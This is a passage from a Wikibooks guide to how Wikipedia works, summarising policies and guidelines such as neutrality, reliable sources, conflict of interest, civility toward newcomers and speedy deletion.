From Wikipedia: A topic is presumed to be notable if it has received significant coverage in reliable secondary sources that are independent of the subject. Note
Despite its daily use in discussions, Notability has not received recognition as official policy. Many people clearly feel that the definition, by means of sources, is flawed and thus still controversial.
No Disclaimers in Articles (NDA)
From Wikipedia: Disclaimers should not be used in articles. All articles are covered by the five official disclaimer pages.
Please Do Not Bite the Newcomers (BITE)
From Wikipedia: Do not be hostile toward newcomers. Remember to assume good faith first and approach them in a polite manner.
This guideline gives a code of conduct for dealing with inexperienced editors. Although they may come across as clueless newbies, they should be treated with understanding and should certainly not be addressed in those terms. The correct approach is to be tactful and helpful, drawing the attention of such editors to any general matters of policy, custom, and convention which they are apparently unaware of.
Polling Is Not a Substitute for Discussion (VOTE)
From Wikipedia: Wikipedia decisions are not made by popular vote, but rather through discussions by reasonable people working toward consensus. Polling is only meant to facilitate discussion and should be used with care.
Reliable Sources (RS)
From Wikipedia: Articles should be based on reliable, third-party, published sources with a reputation for fact-checking and accuracy.
SPAM
This is the guideline against promotional articles, linkspam (external links placed to benefit other websites), and excessive internal posting of messages on user talk pages.
Avoid Instruction Creep
WP:CREEP, although not a proper guideline, has an interesting point to make: The fundamental fallacy of instruction creep is thinking that people read instructions.
Seven Policies to Study[edit]
The five pillars are a good place to begin to familiarize yourself with Wikipedia principles. Perhaps they will live up to the resonant name and serve as a timeless description of Wikipedia, or perhaps they'll just be eternal by Internet-time standards. Policy does evolve, and Wikipedia evolves, too. Before you say you understand the site policies, you might want another perspective. Everyday life on the site will convince you that participating is not quite so simple.
Here is our selection, based on sheer utility, of the major policies to familiarize yourself with first:
- Neutrality (NPOV) from the content policies
- Three-Revert Rule (3RR) and Civility (CIVIL) from the social policies
- Criteria for Speedy Deletion (CSD) from the enabling policies
- What Wikipedia Is Not (NOT) from the general policies
Together, these policies convey the same ideas as the five pillars but are a little more current in their emphasis. Criteria for Speedy Deletion (CSD) is now used in an aggressive fashion to clean up newly created articles that don't meet Wikipedia's standards at all. Therefore, a new editor should know about this policy.
To summarize, be a neutral, civil editor who doesn't rely on reverting pages excessively. Understand that Wikipedia provides space online for its mission to write an encyclopedia and for no other reason, and understand that many submissions of new pages will be deleted summarily from the site because they don't fit the content policies.
That's five policies. Two guidelines may also affect you as soon as you start editing: Conflict of Interest (COI) and Reliable Sources (RS). For obvious reasons, not every guideline can be covered in detail, but these two are very important.
Conflict of Interest
This guideline, at Wikipedia:Conflict of interest, matters because Wikipedia articles should not be hijacked by outside interests. Editors acting for corporations or religious groups are not welcome to edit articles about those companies or groups in such a way as to control the content. No article should be marred by long edit wars involving partisan editors with a definite stake in the topic. The COI guideline is relatively new but has become important because many people would like to exploit Wikipedia's pages. The guideline says simply that editors of Wikipedia should not put their outside interests ahead of those of the encyclopedia. The best way to ensure that is to edit as little as possible in areas too close to your own interests. That includes self-promotion, ensuring favorable coverage of a company that has hired you, and certain types of activism. The guideline is not intended to prevent academics from editing in their field, members of major political parties from editing about related political affairs, or believers editing about their religion, as long as these edits respect the Neutral Point of View policy.
Reliable Sources
Wikipedia:Reliable sources addresses sources and citations on three fronts: the piece of work being cited, its author, and how it is published. First, all sources cited must certainly be published, so an unpublished conversation or email—what academics call a private communication—should not be used as a source. Second, published work has limitations: A self-published book is not a reliable source for factual information in general. Furthermore, websites vary widely in reliability. For the most part, blogs are not acceptable sources. Content on other wikis cannot be taken as authoritative. Online copies of newspaper articles are as good as the hard copy, but newspapers are reliable sources only if they are part of the mainstream press. In practice, high standards of source reliability have to be met if you want to write about controversial matters or (particularly) about living people.
- Further Reading
- List of all official policies
- Category for Wikipedia guidelines
|
http://en.wikibooks.org/wiki/How_Wikipedia_Works/Chapter_13
|
CC-MAIN-2014-15
|
refinedweb
| 7,170
| 52.19
|
Compiling PyGobject on windowsJanuary 5th, 2009 — gianmt
It has been a nightmare from the beginning….
Starting from the new release of Gobject bindings a lot has changed, we now have a new namespace glib where a lot of classes have been moved, of course retaining backward compatibility.
The new library (libpyglib) needs to be shared and not static, so I changed a couple of lines in Makefile.am to build it as a shared lib, basically adding -no-undefined in libpyglib_2_0_la_LDFLAGS, so far so good, the linker is much more happy.
The second problem came when python libs where not linked against this new library, after some resarch I came across a modification to the macro AM_CHECK_PYTHON_HEADERS into gnome-python-extras that Armin Burgmeier made, taking it from a modified version from Murray Cumming… it looks like we do a lot of copy/paste on this things.
So now I have got my $(PYTHON_LDFLAGS) to add to libpyglib_2_0_la_LIBADD and also to the other modules glib gio and gobject, so far so good.
Now i can get it to compile, the dll’s are created and I can change them to .pyd extension which python expects to have, so far so good.
Now when I try to import one of those modules from python I get:
>>> import glib Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/opt/python25/Lib/site-packages/gtk-2.0/glib\__init__.py", line 30, in <module> from glib._glib import * ImportError: DLL load failed: The specified module could not be found. >>>
Now I see two different problems here, obviously the first one is that libpyglib-2.0.dll not found but it’s in the right place C:\opt\Python25\DLLs, the second problem is that there is a path hardcoded (/opt/python25/Lib/site-packages/gtk-2.0/glib\__init__.py) and I don’t understand why is that.
My .profile looks like this:
export PATH=/opt/gnome2/bin:/opt/svn/bin:/opt/python25:$PATH export LD_LIBRARY_PATH=/opt/gnome2/lib export PKG_CONFIG_PATH=/opt/gnome2/lib/pkgconfig:/c/opt/python25/lib/pkgconfig export ACLOCAL_FLAGS="-I /opt/gnome2/share/aclocal" export CC='gcc -mms-bitfields -mthreads' export CPPFLAGS='-I/opt/gnome2/include -I/opt/gnuwin32/include -I/opt/python25/include' export CFLAGS=-g export LDFLAGS='-L/opt/gnome2/lib -L/opt/gnuwin32/lib' export am_cv_python_pythondir=/opt/python25/Lib/site-packages export am_cv_python_pyexecdir=/opt/python25/Lib/site-packages
I run autogen like this:
$ ./autogen.sh --prefix=/opt/Python25 --disable-docs
If someone has got ideas please help
|
http://blogs.gnome.org/gianmt/
|
crawl-002
|
refinedweb
| 423
| 59.03
|
Hi all,
I'm on my way of setting up a web server using mod_python. The user fills out a form, the data is passed to a Python script, the result is presented to the user, done -- sounds pretty simple.
In the first version, I used <form action="run.py" ...>. In the run.py script I get the parameters
def index(req):
params = req.form
and write something like
req.content_type = "text/html"
req.write('''<html>
<head><title>Your request is being processed.</title>
...'''
After some preprocessing the data is finally passed to the actual pipeline:
pipe = apache.import_module(pipeline.py")
pipe.runme(some,params,here, req)
This script sends status messages to req in between all the calculations it has to do. In the end the user gets a link to his result directory and the run.py script finishes with return.
That worked fine for the start, but it seems a bit awkward that the page is loading during the whole time the process needs to finish (~10 min). Mac's Safari by default has a time-out after 1 min, then it stops loading, so I had to come up with something different.
The next idea was to use a system call appending an ampersand -> not to wait for the process to finish:
os.system("python pipeline.py %s/ &" % jobdir)
With the downside, that I have to turn all the Python list and dict objects into text or use the pickle module to pack them and load them again in the script. Also I cannot send status messages from the long-running process.
After that I tried to use os.fork() but ended up with a lot of processes that where not finished properly and high CPU usage.
I read something about double-fork/detaching/daemonizing, but did not entirely get it and think there must be a simpler way to do it.
It's quite common to have a page refreshing every 10 seconds, checking for new results or status messages, while the time-consuming job is running. But I could not find a simple tutorial how to do that with mod_python. Can someone help me out? I'd be very happy. Sorry, if I wrote too much...
I read some similar (but not quite) questions, but all suggestions on them seem to have their own problems. But it were mostly old threads and maybe something happened in the last years, so there is a safe and feasible way to do it.
-- One last 'bonus' question, if the user decides (based on the intermediate results that are presented to him) that he does not want to wait for the analysis, he might leave the page or start over with a new analysis using different parameters. Is it possible to stop the running script then?
Thanks for sharing your time and wisdom.
Best regards,
Anne
________________________________________________________________
Neu: WEB.DE Doppel-FLAT mit Internet-Flatrate + Telefon-Flatrate
für nur 19,99 Euro/mtl.!*
|
https://modpython.org/pipermail/mod_python/2009-July/026259.html
|
CC-MAIN-2022-21
|
refinedweb
| 495
| 73.98
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.